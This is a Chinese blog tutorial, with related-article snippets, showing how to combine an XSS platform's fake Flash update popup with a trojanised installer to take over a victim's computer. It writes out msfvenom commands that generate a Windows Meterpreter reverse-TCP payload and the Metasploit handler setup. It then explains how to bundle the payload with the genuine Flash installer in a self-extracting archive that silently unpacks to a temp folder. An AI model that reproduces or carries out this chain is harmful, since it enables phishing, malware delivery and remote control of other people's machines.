xss flash钓鱼拿到主机控制权 教程

最新推荐文章于 2024-07-23 20:49:03 发布
最新推荐文章于 2024-07-23 20:49:03 发布
阅读量164 收藏 1
点赞数 4
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57682301/article/details/140642491
版权

首先来到xss平台 点击公共模块---flash弹窗钓⻥-查看

点击复制代码并且粘贴到1.js中并且修改为自己的IP

进入kali使用msf生成一个木马代码如下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7(改成自己虚拟机IP) LPORT=4444 -f exe > shell.exe

开启监听

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.1.7

set lport 4444

run

生成shell.exe的文件将其放到你网站的根目录下

去真的flash官网下载安装包---flash官网下载地址:Flash Player官方下载中心-Flash中国官网

将两个⽂件⼀块压缩并更改⽂件名为"Download.exe"并且将压缩包命名为download.exe

标签卡点高级进入自解压选项将解压路径设置为--C:\Windows\Temp并且做如下设置

最后模拟受害者的流程 最终获取到受害者⽹站控制权

狂i
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5394
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
xss flash钓鱼拿到主机控制权
qq_70836100的博客
07-23 132
4.生成钓鱼网站,以flash为例。下载下面的项目并将其源码文件部署在网站根目录。因为木马文件之前选择的是隐藏并且第一个,所以我们的木马会在这个安装界面之前。8.当他点击就会跳转到我的flash,这时候他点击立即下载就会上当。6.去找一个xss漏洞提交1.js,这样管理员登录就会出问题。6.将shell.exe和falsh安装包压缩成一个。7.模拟登录管理员账户后会有以下页面。10.去kali:sysinfo。9.当他运行该文件就会出错。
xss平台获取管理员cookie xss flash钓鱼拿到主机控制权
weixin_71053667的博客
07-23 281
点击"设置"--"解压后运行"如下两行内容...并在"模式"标签下设置"全部隐藏" 配置更新方式----解压并更新文件而覆盖方式----覆盖所有文件。5.将两个文件一块压缩并更改文件名为"flashcenter_pp_ax_install_cn.exe",点击"高级"标签页下的"自解压选项"填。3.来到xss平台 点击公共模块---flash弹窗钓鱼-查看 将其中的代码保存成一个js文件放到我们网站的根目录下面。4.模拟管理员登录后台的操作 登录完成后触发我们插入的恶意代码。# Flash官网下载。
xss漏洞->flash钓鱼网站->拿到主机控制权
最新发布
qq_68186313的博客
07-23 346
xss漏洞->flash钓鱼网站->拿到主机控制权
渗透测试 ( 0 ) --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
freeking101的博客
06-12 3713
渗透测试 --- http协议、XSS、CSRF、文件上传、文件包含、反序列化漏洞
钓鱼Pishing小结
aloneBUThappy的博客
08-16 2144
最近学习xss,对于xss钓鱼的理解不是很深入,所以学习了几篇钓鱼有关的文章,这里算是自己的总结以加深自己的印象,参考了不少的文章,在此感谢前辈们的探索和指教! DNS欺骗钓鱼 定义 DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。 ——百度百科 原理 如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。DNS欺骗其实并不是真的“黑掉”了对方的网站,而是冒名顶替、招摇撞骗罢了。 .
Kali Linux-BeEF浏览器渗透框架
道阻且长,行则将至。
12-26 4658
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助 Kali Linux 系统内置的 BeEF 渗透框架,通过一段编制好的JS代码控制目标主机 Win 7 虚拟机的浏览器,进而进行社会工程学攻击(发送钓鱼网页盗窃账户密码、恶意程序发送等)和其他攻击,同时演示借助 Win 7上搭建的DVWA靶场的存储型XSS漏洞自动触发JS攻击脚本(获取Cookie)。 环境说明 ...
[转]信息安全相关理论题(四)
热门推荐
Herry_Lee的专栏
02-18 3万+
26、____表示邮件服务器返回代码为临时性失败(xx代表任意数)。 A、 2xx B、 3xx C、 4xx D、 5xx 您的答案: 标准答案: C 27、买家称购买商品异常后的正确操作是立即咨询官方客服。 A、 正确 B、 错误 您的答案: 标准答案: A 28、网上陌生人给你发送补丁文件正确的操作是不下载文件。 A、 错误 B、 正确 您的答...
xss、脏牛提权.zip
06-18
XSS与脏牛提权:深度解析与实践》 XSS(Cross-site scripting)攻击是一种常见的网络安全问题,它利用了网站对用户输入数据的信任,将恶意脚本注入到网页中,进而对用户进行攻击。在给定的“xss注入闯关小游戏”...
Flash XSS漏洞挖掘1
08-03
Flash XSS漏洞挖掘1】 Flash XSS(跨站脚本)漏洞是网络安全领域中一个重要的问题,尤其是在企业级的Bug Bounty活动中。尽管这个概念并不新鲜,早在2002年就已经有相关的技术出现,但近期在Apple、Amazon、Adobe...
xss-lab全通关教程
05-07
XSS(Cross-Site Scripting)实验室全通关教程是一份深度学习和实践XSS漏洞攻防的宝贵资源。XSS是一种常见的网络安全问题,它允许攻击者在用户浏览器中注入恶意脚本,从而窃取敏感信息、操纵用户行为或进行其他危害...
Web-安全渗透全套教程XSS跨.zip
05-22
视频"Web-安全渗透全套教程XSS跨.mp4"很可能是该教程的主要教学内容,涵盖上述各个知识点,通过实战演示和讲解,帮助学习者掌握XSS攻防的核心技能。对于前端开发人员、网络安全工程师以及对Web安全感兴趣的个人来说...
记一次因敏感信息泄露而导致的越权+存储型XSS
2301_80127209的博客
07-23 310
可能各位师傅会有苦于不知道如何寻找测试目标的烦恼,这里我惯用的就是寻找可进站的思路。这个思路分为两种,一是弱口令进站测试,二是可注册进站测试。依照这个思路,我依旧是用鹰图进行了一波资产的搜集。
CSRF+XSS组合攻击实战
记录学习
07-19 1340
xss和csrf组合攻击漏洞复现
DVWA靶场超(详细教程)--跨站攻击(XSS+CSRF)
weixin_60838266的博客
07-19 1126
webanquan”去掉了(替换为空),我们的输入从alert变成了alert()
Vue使用FullCalendar实现日历/周历/月历
_小郑有点困了的博客
07-23 176
需求背景:项目上遇到新需求,要求实现工单以日/周/月历形式展示。而且要求不同工单根据状态显示不同颜色,一个工单内部,需要以不同颜色显示三个阶段。
XSS高级实战:从基础到深度利用
"XSS高级实战教程" XSS(Cross Site Scripting)是一种常见的网络安全漏洞,攻击者通过在网页上注入恶意脚本,使得用户在访问这些页面时执行这些脚本,从而达到攻击目的。XSS攻击的核心是利用了网站对用户输入数据...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值